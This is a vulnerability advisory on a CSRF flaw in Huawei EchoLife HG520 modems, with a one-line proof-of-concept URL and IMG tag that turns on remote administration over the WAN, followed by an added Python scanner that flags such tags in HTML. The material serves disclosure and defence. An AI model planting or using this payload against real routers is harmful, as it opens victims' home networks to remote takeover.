Huawei EchoLife HG520 RemoteManagement CSRF
Summary
Huawei EchoLife HG520 modems do not require authentication to access certain pages such as: '/Forms/access_cwmp_1', '/Forms/rpQos_1' and '/Forms/rpRManage_1'. A CSRF exploit can be used to enable remote administration interfaces on the WAN.
Description
=========================================
HUAWEI ECHOLIFE HG520 RemoteManagement CSRF
=========================================
Device:            Huawei EchoLife HG520
Software Version:  V100R001B021Telmex
                   V100R001B020Telmex
Firmware Version:  3.10.18.7-1.0.7.0 (latest version)
                   3.10.18.5-1.0.7.0
Vulnerable Models: HG520c
                   HG520b
Published date:    2010-04-00
Criticality:       High
Impact:            Enable remote admin on WAN
Location:          Web interface (LAN/WAN)
Solution:          Not available
Websec-id:         ws10-12
DESCRIPTION
=======================
Huawei EchoLife HG520 modems do not require authentication to access certain pages such as: '/Forms/access_cwmp_1', '/Forms/rpQos_1' and '/Forms/rpRManage_1'. A CSRF exploit can be used to enable remote administration interfaces on the WAN.
EXPLOIT / POC
=======================
Enable FTP, TELNET and WEB by sending a request to:
http://192.168.1.254/Forms/rpRManage_1?ACL_active=0
Client-Side:
<IMG SRC=http://192.168.1.254/Forms/rpRManage_1?ACL_active=0>
SOLUTION
=======================
Not available.
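With no fix available, one defensive option is to scan HTML passing through a proxy or mail gateway for embedded resources that point at the handlers listed above. The following is an added example, not part of the original advisory: the names `scan_html`, `RouterCsrfScanner` and `is_lan_host` are hypothetical, the sample markup is constructed, and only literal RFC 1918 addresses are matched (hostnames are not resolved).

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Unauthenticated form handlers named in the advisory.
HG520_PATHS = {"/Forms/access_cwmp_1", "/Forms/rpQos_1", "/Forms/rpRManage_1"}
URL_ATTRS = {"src", "href", "action", "data"}
LAN_NETS = [ipaddress.ip_network(n)
            for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample page: benign image, the advisory's tag, a non-LAN link.
SAMPLE = """<html><body><img src="https://example.com/logo.png">
<IMG SRC=http://192.168.1.254/Forms/rpRManage_1?ACL_active=0>
<a href="http://203.0.113.5/Forms/rpRManage_1?ACL_active=0">x</a></body></html>"""

def is_lan_host(host):
    """True when host is a literal IP address inside an RFC 1918 range."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # hostnames are not resolved in this sketch
    return any(ip in net for net in LAN_NETS)

class RouterCsrfScanner(HTMLParser):
    """Collects tags whose URL attributes target the HG520 form handlers."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name not in URL_ATTRS or not value:
                continue
            try:
                url = urlsplit(value.strip())
            except ValueError:
                continue  # malformed URL, nothing to match
            if (url.scheme in ("http", "https") and url.hostname
                    and is_lan_host(url.hostname)
                    and url.path in HG520_PATHS):
                self.findings.append((tag, name, url.hostname, url.path, url.query))

def scan_html(markup):
    """Return (tag, attribute, host, path, query) for each suspicious reference."""
    scanner = RouterCsrfScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings
```

Calling `scan_html(SAMPLE)` flags only the `IMG` tag aimed at the LAN address; the benign image and the link to a non-LAN address are ignored.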
DISCLOSURE TIMELINE
=======================
2010/03/20 - Vulnerability discovered
REFERENCES
=======================
Hakim.Ws - http://www.hakim.ws
Websec - http://websec.mx